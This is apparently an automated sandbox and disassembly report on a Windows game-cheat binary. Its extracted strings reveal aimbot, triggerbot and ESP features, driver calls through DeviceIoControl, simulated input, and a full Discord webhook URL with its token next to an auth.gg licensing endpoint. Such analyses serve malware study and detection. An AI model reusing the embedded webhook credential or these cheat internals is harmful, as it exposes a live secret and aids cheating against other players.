Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: abf6917f7ad20cba7f178f7487317c45415fce318fb883ae6b8b72ed5257d05d
Instruction ID: 0076b55365c1426b7288a77b39c21b64555148531a7e2f090dee85dc26acb758
Opcode Fuzzy Hash: abf6917f7ad20cba7f178f7487317c45415fce318fb883ae6b8b72ed5257d05d
Instruction Fuzzy Hash: 44B01274E5A2C3D7EB1C3B326C9203962A0AB0CF10FD0043AC50A49320CD3D91DA5F20

Non-executed Functions

Function 00007FF735DDB3D0 Relevance: 111.9, APIs: 4, Strings: 59, Instructions: 1685keyboardCOMMON

Download Yara Rule

APIs

GetAsyncKeyState.USER32 ref: 00007FF735DDB423

Part of subcall function 00007FF735DB3190: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB31F3
Part of subcall function 00007FF735DB3190: memmove.VCRUNTIME140 ref: 00007FF735DB3213
Part of subcall function 00007FF735DB3190: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB3233

Part of subcall function 00007FF735DDA4E0: CreateThread.KERNEL32 ref: 00007FF735DDA5CA
Part of subcall function 00007FF735DDA4E0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DDA605

exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DDCF90
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DDD21D

Part of subcall function 00007FF735DDE9C0: memmove.VCRUNTIME140(?,?,?,?,00007FF735DD18E5), ref: 00007FF735DDE9F8

Part of subcall function 00007FF735DD3980: memset.VCRUNTIME140 ref: 00007FF735DD39B0
Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3A00
Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3A12
Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3A24
Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3A36
Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF735DD3A48
Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF735DD3A5A
Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF735DD3A6C
Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3A7E
Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF735DD3A90
Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3AA2
Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF735DD3AB4
Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3AC6
Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3AD8
Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3AEA
Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3AFC
Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3B0E
Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3B20
Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3B32
Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3B44
Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3B56
Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3B68
Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3B7A
Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3B8C
Part of subcall function 00007FF735DD3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAM@Z.MSVCP140 ref: 00007FF735DD3B9E

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DDD2BD

Strings

Prediction , xrefs: 00007FF735DDCE34
Render Count, xrefs: 00007FF735DDCB90
Fov Size, xrefs: 00007FF735DDC8D7
Air Stuck, xrefs: 00007FF735DDCF68
%.0f, xrefs: 00007FF735DDB45E
Box, xrefs: 00007FF735DDCA9E
Semi Config, xrefs: 00007FF735DDD552
Shotgun Settings, xrefs: 00007FF735DDCC3B
Save/Load, xrefs: 00007FF735DDD14C
SMG Fov, xrefs: 00007FF735DDCD6E
##Main, xrefs: 00007FF735DDC605, 00007FF735DDC639
%.3f, xrefs: 00007FF735DDC84B
Filled Fov, xrefs: 00007FF735DDC898
Config, xrefs: 00007FF735DDC4A5
Corner, xrefs: 00007FF735DDCA57, 00007FF735DDCA89
Visuals, xrefs: 00007FF735DDC3AB
##Mains, xrefs: 00007FF735DDD44F, 00007FF735DDD483
Rank, xrefs: 00007FF735DDCB0B
Prediction, xrefs: 00007FF735DDC75F, 00007FF735DDCC4E
Hitbox, xrefs: 00007FF735DDC9AE
Prediction , xrefs: 00007FF735DDCCF0
Aimbot, xrefs: 00007FF735DDC6B6
Unload, xrefs: 00007FF735DDCF7E
Rifle Settings, xrefs: 00007FF735DDCD7F
Combat, xrefs: 00007FF735DDC32E
Rifle Fov, xrefs: 00007FF735DDCE10
SMG Settings, xrefs: 00007FF735DDCCDD
Triggerbot, xrefs: 00007FF735DDC772
Misc, xrefs: 00007FF735DDC522
config.json, xrefs: 00007FF735DDD1CD, 00007FF735DDD26D
Fov Circle, xrefs: 00007FF735DDC885
Distance, xrefs: 00007FF735DDCB7D
##Main1, xrefs: 00007FF735DDD10C, 00007FF735DDD140
Username, xrefs: 00007FF735DDCB31
Save Config, xrefs: 00007FF735DDD1A7
Prediction , xrefs: 00007FF735DDCD92
Fov Arrows, xrefs: 00007FF735DDCB6A
(AIR STUCK)RISKY FEATURE:, xrefs: 00007FF735DDCF50
Triggerbot Distance (m), xrefs: 00007FF735DDC872
Sniper Settings, xrefs: 00007FF735DDCE21
Skeleton, xrefs: 00007FF735DDCB57
Weapon config, xrefs: 00007FF735DDCC2A
Load Config, xrefs: 00007FF735DDD243
Snapline, xrefs: 00007FF735DDCB44
Triggerbot Delay (ms), xrefs: 00007FF735DDC82D
Rage Config, xrefs: 00007FF735DDD5B6
Shotgun Fov, xrefs: 00007FF735DDCCCC
Draw Filled, xrefs: 00007FF735DDCB1E
@, xrefs: 00007FF735DDB69E
Weapon, xrefs: 00007FF735DDC428, 00007FF735DDCAF8
Sniper Smooth, xrefs: 00007FF735DDCE73
Rifle Smooth, xrefs: 00007FF735DDCDD1
Legit Config, xrefs: 00007FF735DDD4EE
Smoothing, xrefs: 00007FF735DDC916
Options, xrefs: 00007FF735DDD48F
Shotgun Smooth, xrefs: 00007FF735DDCC8D
SMG Smooth, xrefs: 00007FF735DDCD2F
Orqur Public, xrefs: 00007FF735DDB482
Sniper Fov, xrefs: 00007FF735DDCEB2

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: ??5?$basic_istream@D@std@@@std@@U?$char_traits@V01@$_invalid_parameter_noinfo_noreturn$memmove$AsyncCreateStateThreadexitfreemallocmemset
String ID: ##Main$##Main1$##Mains$%.0f$%.3f$(AIR STUCK)RISKY FEATURE:$@$Aimbot$Air Stuck$Box$Combat$Config$Corner$Distance$Draw Filled$Filled Fov$Fov Arrows$Fov Circle$Fov Size$Hitbox$Legit Config$Load Config$Misc$Options$Orqur Public$Prediction$Prediction $Prediction $Prediction $Rage Config$Rank$Render Count$Rifle Fov$Rifle Settings$Rifle Smooth$SMG Fov$SMG Settings$SMG Smooth$Save Config$Save/Load$Semi Config$Shotgun Fov$Shotgun Settings$Shotgun Smooth$Skeleton$Smoothing$Snapline$Sniper Fov$Sniper Settings$Sniper Smooth$Triggerbot$Triggerbot Delay (ms)$Triggerbot Distance (m)$Unload$Username$Visuals$Weapon$Weapon config$config.json
API String ID: 352513250-2218353132
Opcode ID: e41536d4fd240ff1ba4a7aa7d897d4f427ab51982afeffa53f5ce13242ca367e
Instruction ID: bde14d377bb8206e5b2e13dbfb3bfe94d393e7d3c4432a08c22595af74266c7c
Opcode Fuzzy Hash: e41536d4fd240ff1ba4a7aa7d897d4f427ab51982afeffa53f5ce13242ca367e
Instruction Fuzzy Hash: 9023E232919AC7A6E700EB25D9802F9B760FB99F44F858332DA4D1B261DF7DE184DB10

Function 00007FF735DD76D0 Relevance: 79.1, APIs: 40, Strings: 4, Instructions: 2124COMMON

Download Yara Rule

APIs

_CxxThrowException.VCRUNTIME140 ref: 00007FF735DD7723

Part of subcall function 00007FF735DDE9C0: memmove.VCRUNTIME140(?,?,?,?,00007FF735DD18E5), ref: 00007FF735DDE9F8

Part of subcall function 00007FF735DDE9C0: memmove.VCRUNTIME140(?,?,?,?,00007FF735DD18E5), ref: 00007FF735DDEA98

Part of subcall function 00007FF735DDE9C0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF735DDEAB6

Part of subcall function 00007FF735DDE9C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF735DD18E5), ref: 00007FF735DDEA75

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD8E04
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD8E45
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD8E86
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD8EC5
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD8F04
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD8F43
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD8F82
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD8FC1
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD9000
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD903F
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD907E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD90C3
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD9108
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD914D
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD9192
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD91D7
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD921C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD9261
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD92A6
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD92EB
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD9330
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD9375
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD93BA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD93FF
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD9444
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD9489
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD94CE
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD9513
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD9558
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD959D
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD95E2
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD9627
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD966C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD96B1
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD96F6
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD973B

Part of subcall function 00007FF735DE77C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00007FF735DD2701), ref: 00007FF735DE7818

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD9780
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD97C5
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD980A

Strings

https://discord.com/api/webhooks/1247249666907701321/mhniI9J0YWG308w-rJbT6rxKaLF0IflJIgI4sGWLEdUFWwOfglnFe9ULMgnrQPphdYlK, xrefs: 00007FF735DD8866, 00007FF735DD8951, 00007FF735DD8D1F
success, xrefs: 00007FF735DD786D, 00007FF735DD789C, 00007FF735DD78CB, 00007FF735DD78FA, 00007FF735DD7929, 00007FF735DD7958, 00007FF735DD7987, 00007FF735DD79B6, 00007FF735DD79E5, 00007FF735DD7A14, 00007FF735DD7A43, 00007FF735DD7A72, 00007FF735DD7AA1, 00007FF735DD7AD0, 00007FF735DD7AFF, 00007FF735DD7B2E, 00007FF735DD7B5D, 00007FF735DD7B8C, 00007FF735DD7BBB, 00007FF735DD7BEA, 00007FF735DD7C19, 00007FF735DD7C48, 00007FF735DD7C77, 00007FF735DD7CA6, 00007FF735DD7CD5, 00007FF735DD7D04, 00007FF735DD7D33, 00007FF735DD7D62, 00007FF735DD7D91, 00007FF735DD7DC0, 00007FF735DD7DEF, 00007FF735DD7E1E, 00007FF735DD7E4D, 00007FF735DD7E7C, 00007FF735DD7EAB, 00007FF735DD7EDA, 00007FF735DD7F09, 00007FF735DD7F38, 00007FF735DD7F67, 00007FF735DD7F96, 00007FF735DD7FC5, 00007FF735DD7FF4, 00007FF735DD8023, 00007FF735DD8052, 00007FF735DD8081, 00007FF735DD80B0, 00007FF735DD80DF, 00007FF735DD810E, 00007FF735DD813D, 00007FF735DD816C, 00007FF735DD819B, 00007FF735DD81CA, 00007FF735DD81F9, 00007FF735DD8228, 00007FF735DD8257, 00007FF735DD8286, 00007FF735DD82B5, 00007FF735DD82E4, 00007FF735DD8313, 00007FF735DD8342, 00007FF735DD8371, 00007FF735DD83A0, 00007FF735DD83CF, 00007FF735DD83FE, 00007FF735DD842D, 00007FF735DD845C, 00007FF735DD848B, 00007FF735DD84BA, 00007FF735DD84E9, 00007FF735DD8518, 00007FF735DD8547, 00007FF735DD8576, 00007FF735DD85A5, 00007FF735DD85D4, 00007FF735DD8603, 00007FF735DD8632, 00007FF735DD8661, 00007FF735DD8690, 00007FF735DD86BF, 00007FF735DD86EE, 00007FF735DD871D, 00007FF735DD874C, 00007FF735DD877B, 00007FF735DD87AA, 00007FF735DD87D9, 00007FF735DD8808, 00007FF735DD8837, 00007FF735DD8895, 00007FF735DD88C4, 00007FF735DD88F3, 00007FF735DD8922, 00007FF735DD8980, 00007FF735DD89AF, 00007FF735DD89DE, 00007FF735DD8A0D, 00007FF735DD8A3C, 00007FF735DD8A6B, 00007FF735DD8A9A, 00007FF735DD8AF8, 00007FF735DD8B27, 00007FF735DD8B85, 00007FF735DD8BB4, 00007FF735DD8C3B, 00007FF735DD8C61, 00007FF735DD8C87, 00007FF735DD8CAD, 00007FF735DD8CD3, 00007FF735DD8CF9, 00007FF735DD8D45, 00007FF735DD8D6D, 00007FF735DD8D96, 00007FF735DD8DBF
https://auth.gg/, xrefs: 00007FF735DD8AC9, 00007FF735DD8B56, 00007FF735DD8BE3, 00007FF735DD8C12
exists, xrefs: 00007FF735DD76E4

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memmove$Concurrency::cancel_current_taskExceptionThrow
String ID: exists$https://auth.gg/$https://discord.com/api/webhooks/1247249666907701321/mhniI9J0YWG308w-rJbT6rxKaLF0IflJIgI4sGWLEdUFWwOfglnFe9ULMgnrQPphdYlK$success
API String ID: 1685566030-3501797402
Opcode ID: 8f290b9844bc66554e0943b9491429710f4931945cb82aa81e51fda4236204cc
Instruction ID: e50d6bbf66e6c33a332ee81cbcfbee1d435f40bc44558f4892763b14462942f6
Opcode Fuzzy Hash: 8f290b9844bc66554e0943b9491429710f4931945cb82aa81e51fda4236204cc
Instruction Fuzzy Hash: 1D239452E65BC7A4EB20FB30CC813F85361EF9AB84F906736E55C1599ADF68A680D310

Function 00007FF735DDD840 Relevance: 67.5, APIs: 19, Strings: 19, Instructions: 1002keyboardCOMMON

Download Yara Rule

APIs

pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DDD89A
pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DDD8AD
pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DDD8C4
sqrt.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DDD8E6
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DDDE89

Part of subcall function 00007FF735DE8140: DeviceIoControl.KERNEL32 ref: 00007FF735DE81F9

Part of subcall function 00007FF735DE8040: DeviceIoControl.KERNEL32 ref: 00007FF735DE80F9

Part of subcall function 00007FF735DE8310: DeviceIoControl.KERNEL32 ref: 00007FF735DE83FC

Part of subcall function 00007FF735DD27C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD28B1

Part of subcall function 00007FF735DD2330: DeviceIoControl.KERNEL32 ref: 00007FF735DD23ED

Part of subcall function 00007FF735DE8230: DeviceIoControl.KERNEL32 ref: 00007FF735DE82E5

pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DDE137
pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DDE156
memchr.VCRUNTIME140 ref: 00007FF735DDE200
memchr.VCRUNTIME140 ref: 00007FF735DDE23C
memchr.VCRUNTIME140 ref: 00007FF735DDE26E

Part of subcall function 00007FF735DDD840: sqrt.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DDE178
Part of subcall function 00007FF735DDD840: memchr.VCRUNTIME140 ref: 00007FF735DDE29B
Part of subcall function 00007FF735DDD840: memchr.VCRUNTIME140 ref: 00007FF735DDE2CD
Part of subcall function 00007FF735DDD840: memchr.VCRUNTIME140 ref: 00007FF735DDE2FB
Part of subcall function 00007FF735DDD840: memchr.VCRUNTIME140 ref: 00007FF735DDE330
Part of subcall function 00007FF735DDD840: memchr.VCRUNTIME140 ref: 00007FF735DDE365

SendInput.USER32 ref: 00007FF735DDE50E
GetAsyncKeyState.USER32 ref: 00007FF735DDE537

Strings

Rifl, xrefs: 00007FF735DDE2D7
Scoped Assault Rifle, xrefs: 00007FF735DDDD3E
Assault Rifle, xrefs: 00007FF735DDDC3E
Hunting Rifle, xrefs: 00007FF735DDDA14
Snip, xrefs: 00007FF735DDE340
Reaper Sniper Rifle, xrefs: 00007FF735DDD927
Tactical Assault Rifle, xrefs: 00007FF735DDDCCA
Storm Scout Sniper Rifle, xrefs: 00007FF735DDD9DA
Tactical Shotgun, xrefs: 00007FF735DDDAD4
Bolt-Action Sniper Rifle, xrefs: 00007FF735DDD961
Compact SMG, xrefs: 00007FF735DDDBAF
Rapid Fire SMG, xrefs: 00007FF735DDDBEF
Heavy Sniper Rifle, xrefs: 00007FF735DDD9A0
Thermal Scoped Assault Rifle, xrefs: 00007FF735DDDD04
Charge Shotgun, xrefs: 00007FF735DDDB14
Suppressed SMG, xrefs: 00007FF735DDDB63
Burst Assault Rifle, xrefs: 00007FF735DDDC8A
Pump Shotgun, xrefs: 00007FF735DDDA88
Shot, xrefs: 00007FF735DDE210

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: memchr$ControlDevice$_invalid_parameter_noinfo_noreturnsqrt$AsyncInputSendState
String ID: Assault Rifle$Bolt-Action Sniper Rifle$Burst Assault Rifle$Charge Shotgun$Compact SMG$Heavy Sniper Rifle$Hunting Rifle$Pump Shotgun$Rapid Fire SMG$Reaper Sniper Rifle$Rifl$Scoped Assault Rifle$Shot$Snip$Storm Scout Sniper Rifle$Suppressed SMG$Tactical Assault Rifle$Tactical Shotgun$Thermal Scoped Assault Rifle
API String ID: 175615221-766504981
Opcode ID: 4feb196e68ac052c87c4f073a617603d243994505892737762729c1fa3753db3
Instruction ID: ef3cfe79fede9f2e54f359a239e89e79c4ee7ebd9bf7071f4a79f084712a2890
Opcode Fuzzy Hash: 4feb196e68ac052c87c4f073a617603d243994505892737762729c1fa3753db3
Instruction Fuzzy Hash: 3EA2FD22D18687A5FA21BB35D9803B8B3A0EF55F94F844332D96D276E5DF3CB581A310

Function 00007FF735DEBAEC Relevance: 33.2, APIs: 22, Instructions: 224fileCOMMON

Download Yara Rule

APIs

GetFileAttributesExW.KERNEL32 ref: 00007FF735DEBB99
GetLastError.KERNEL32 ref: 00007FF735DEBBA3
FindFirstFileW.KERNEL32 ref: 00007FF735DEBBBA
GetLastError.KERNEL32 ref: 00007FF735DEBBC6
FindClose.KERNEL32 ref: 00007FF735DEBBD4
__std_fs_open_handle.LIBCPMT ref: 00007FF735DEBC67
CloseHandle.KERNEL32 ref: 00007FF735DEBC7D
CloseHandle.KERNEL32 ref: 00007FF735DEBDFA
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DEBE04

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handleabort
String ID:
API String ID: 4293554670-0
Opcode ID: 7ae844d97ca427b6ce6af28b0596caf87c954280dfe8d4290212548341a06eee
Instruction ID: 0a104937324b5793a27ac86169e8e4b5bfeb8eae929e4fc0f6371edd670d0427
Opcode Fuzzy Hash: 7ae844d97ca427b6ce6af28b0596caf87c954280dfe8d4290212548341a06eee
Instruction Fuzzy Hash: F891E631B2AA0356F66CAB25A880675A2A0EF45FB4F844730D97E477D8DF3CF441A720

Function 00007FF735DDEDD0 Relevance: 30.1, APIs: 7, Strings: 10, Instructions: 359COMMON

